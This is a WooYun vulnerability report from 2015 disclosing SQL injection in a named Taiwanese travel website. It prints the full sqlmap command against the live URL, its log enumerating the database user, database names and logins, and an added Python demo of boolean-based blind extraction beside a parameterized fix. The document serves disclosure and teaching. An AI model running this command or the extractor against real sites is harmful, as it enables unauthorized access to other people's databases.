Vulnerability summary

Defect ID: wooyun-2015-0103580

Title: SQL injection in a Taiwanese travel website

Vendor: Hitcon台湾互联网漏洞报告平台 (Hitcon Taiwan Internet Vulnerability Reporting Platform)

Author: 路人甲

Submitted: 2015-03-26 15:43

Fixed: 2015-05-13 04:08

Disclosed: 2015-05-13 04:08

Type: SQL injection

Severity: High

Self-assessed rank: 18

Status: Handed to a third-party partner organization (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure timeline:

2015-03-26: Details sent to the vendor; awaiting vendor handling
2015-03-29: Vendor confirmed; details visible to the vendor only
2015-04-08: Details opened to core white hats and relevant domain experts
2015-04-18: Details opened to regular white hats
2015-04-28: Details opened to intern white hats
2015-05-13: Details opened to the public

Brief description:

As the title says.

Detailed description:

[Three screenshots in the original (QQ截图20150325083256.png, QQ截图20150325083307.png, QQ截图20150325083321.png) are not reproduced here.]

Proof of vulnerability:

[root@Hacker~]# sqlmap.py -u "http://www.mellowtour.com.tw/webobj/NewPost/ShowPost.asp?id_no=9768&postClass=1" --dbs --passwords --current-user --current-db --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 07:58:13
[07:58:14] [INFO] testing connection to the target URL
[07:58:14] [INFO] testing if the target URL is stable. This can take a couple of seconds
[07:58:15] [INFO] target URL is stable
[07:58:15] [INFO] testing if GET parameter 'id_no' is dynamic
[07:58:16] [INFO] confirming that GET parameter 'id_no' is dynamic
[07:58:21] [WARNING] GET parameter 'id_no' does not appear dynamic
[07:58:22] [WARNING] heuristic (basic) test shows that GET parameter 'id_no' might not be injectable
[07:58:22] [INFO] testing for SQL injection on GET parameter 'id_no'
[07:58:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:58:23] [INFO] GET parameter 'id_no' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[07:58:31] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
[07:58:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:58:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[07:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:59:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[07:59:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:59:07] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[07:59:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[07:59:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[07:59:55] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[08:00:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:00:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[08:00:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[08:00:30] [INFO] testing 'MySQL inline queries'
[08:00:30] [INFO] testing 'PostgreSQL inline queries'
[08:00:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:00:30] [INFO] testing 'Oracle inline queries'
[08:00:30] [INFO] testing 'SQLite inline queries'
[08:00:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:00:31] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[08:00:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:00:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:00:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:00:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:00:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:00:44] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[08:01:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:01:05] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[08:01:10] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[08:01:10] [INFO] testing 'Oracle AND time-based blind'
[08:01:10] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[08:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[08:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[08:01:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:01:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:02:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:02:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:02:29] [INFO] checking if the injection point on GET parameter 'id_no' is a false positive
GET parameter 'id_no' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Place: GET
Parameter: id_no
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id_no=9768 AND 3961=3961&postClass=1
---
[08:17:59] [INFO] testing MySQL
[08:17:59] [WARNING] the back-end DBMS is not MySQL
[08:17:59] [INFO] testing Oracle
[08:17:59] [WARNING] the back-end DBMS is not Oracle
[08:17:59] [INFO] testing PostgreSQL
[08:18:00] [WARNING] the back-end DBMS is not PostgreSQL
[08:18:00] [INFO] testing Microsoft SQL Server
[08:18:00] [INFO] confirming Microsoft SQL Server
[08:18:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[08:18:13] [INFO] fetching current user
[08:18:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:18:13] [INFO] retrieved: travel104
current user: 'travel104'
[08:19:25] [INFO] fetching current database
[08:19:25] [INFO] retrieved: BuySmart
[08:20:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:20:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:21:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:21:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:22:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:22:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:23:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:24:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
current database: 'BuySmart'
[08:24:18] [INFO] testing if current user is DBA
[08:24:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[08:24:18] [INFO] fetching database users password hashes
[08:24:18] [INFO] fetching database users
[08:24:18] [INFO] fetching number of database users
[08:24:18] [INFO] retrieved: 2
[08:24:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:24:42] [INFO] retrieved: sa
[08:25:15] [INFO] retrieved: travel104
[08:26:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:26:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:27:06] [INFO] fetching number of password hashes for user 'sa'
[08:27:06] [INFO] retrieved: 0
[08:27:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:27:39] [WARNING] unable to retrieve the number of password hashes for user 'sa'
[08:27:39] [INFO] fetching number of password hashes for user 'travel104'
[08:27:39] [INFO] retrieved: 0
[08:27:44] [WARNING] unable to retrieve the number of password hashes for user 'travel104'
[08:27:44] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table)
[08:27:44] [INFO] fetching database names
[08:27:44] [INFO] fetching number of databases
[08:27:44] [INFO] retrieved: 13
[08:27:59] [INFO] retrieved: 931.travelnet.com.tw
[08:29:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:31:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:31:38] [INFO] retrieved: AirChina
[08:32:24] [INFO] retrieved: BuySma
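The sqlmap run above found an AND boolean-based blind injection in the id_no parameter and then read the current user and database out of it one character at a time, through a server that kept timing out. The Python below is an added example, not code from the report or from the site: it builds a constructed in-memory SQLite stand-in for ShowPost.asp (the handler, table and column names and the rows are assumptions; the live target ran Microsoft SQL Server 2008, where the probe would be spelled ASCII(SUBSTRING(...)) and the values sqlmap read come from SYSTEM_USER and DB_NAME()), runs the attacker-side binary search that sqlmap's boolean-based technique performs, and, because the report's fix section is empty, adds a parameterized version of the same handler against which the same oracle yields nothing.

```python
import sqlite3

# --- toy stand-in for ShowPost.asp (constructed; not the site's code) -------

def build_db():
    """In-memory SQLite database with constructed rows. db_info stands in for
    the MSSQL metadata sqlmap read (SYSTEM_USER, DB_NAME())."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id_no INTEGER, postClass INTEGER, title TEXT)")
    conn.execute("INSERT INTO posts VALUES (9768, 1, 'constructed post')")
    conn.execute("CREATE TABLE db_info (db_user TEXT, db_name TEXT)")
    conn.execute("INSERT INTO db_info VALUES ('travel104', 'BuySmart')")
    return conn


def show_post_vulnerable(conn, id_no, post_class):
    """The flaw: request parameters are pasted straight into the WHERE clause,
    so 'id_no=9768 AND 3961=3961' becomes part of the SQL text."""
    sql = f"SELECT title FROM posts WHERE id_no={id_no} AND postClass={post_class}"
    return "found" if conn.execute(sql).fetchall() else "nothing"


def show_post_fixed(conn, id_no, post_class):
    """Hardened: validate the type, then bind values with placeholders so the
    driver never interprets them as SQL."""
    try:
        id_no, post_class = int(id_no), int(post_class)
    except ValueError:
        return "nothing"  # same page as a missing post: no boolean oracle
    sql = "SELECT title FROM posts WHERE id_no=? AND postClass=?"
    return "found" if conn.execute(sql, (id_no, post_class)).fetchall() else "nothing"


# --- attacker side: what sqlmap's boolean-based blind technique does -------

class BlindClient:
    """Sends one 'request' per probe and counts them, as sqlmap reports."""

    def __init__(self, handler, conn):
        self.handler, self.conn, self.requests = handler, conn, 0

    def truthy(self, condition):
        """True iff appending 'AND <condition>' still renders the post."""
        self.requests += 1
        return self.handler(self.conn, f"9768 AND {condition}", "1") == "found"

    def injectable(self):
        """sqlmap's confirmation step: a true and a false tautology must give
        different pages (the report's payload was 'AND 3961=3961')."""
        return self.truthy("3961=3961") and not self.truthy("3961=3962")

    def extract(self, expr, max_len=32):
        """Recover the text value of SQL expression `expr` one character at a
        time by binary search on its code point (about 7 probes per char).
        MSSQL spells the probe ASCII(SUBSTRING(...)); SQLite unicode(substr(...))."""
        out = ""
        for pos in range(1, max_len + 1):
            lo, hi = 0, 127
            while lo < hi:
                mid = (lo + hi) // 2
                if self.truthy(f"unicode(substr(({expr}),{pos},1))>{mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            if lo == 0:  # past the end: substr() is '' and unicode('') is NULL
                break
            out += chr(lo)
        return out


if __name__ == "__main__":
    conn = build_db()
    attacker = BlindClient(show_post_vulnerable, conn)
    print("injectable:", attacker.injectable())
    print("current user:", attacker.extract("SELECT db_user FROM db_info"))
    print("current db:", attacker.extract("SELECT db_name FROM db_info"))
    print("probes used:", attacker.requests)
    patched = BlindClient(show_post_fixed, conn)
    print("injectable after fix:", patched.injectable())
    print("extracted after fix:", repr(patched.extract("SELECT db_user FROM db_info")))
```

Against the vulnerable handler the client confirms the injection with the same pair of tautologies sqlmap used and recovers 'travel104' and 'BuySmart' in a few dozen probes; against the parameterized handler both tautologies produce the same page, so the extractor terminates on the first character with an empty string. Two details of the log are worth reading the same way: "current user is DBA: False" and the failed password-hash fetch show the application's login was not sysadmin, which blocked --passwords but, as the --dbs output shows, not enumeration of the 13 databases that login could see.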

Fix recommendation:

(none provided)

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-03-29 04:07

Vendor reply:

Thank you for the report.

Latest status:

None yet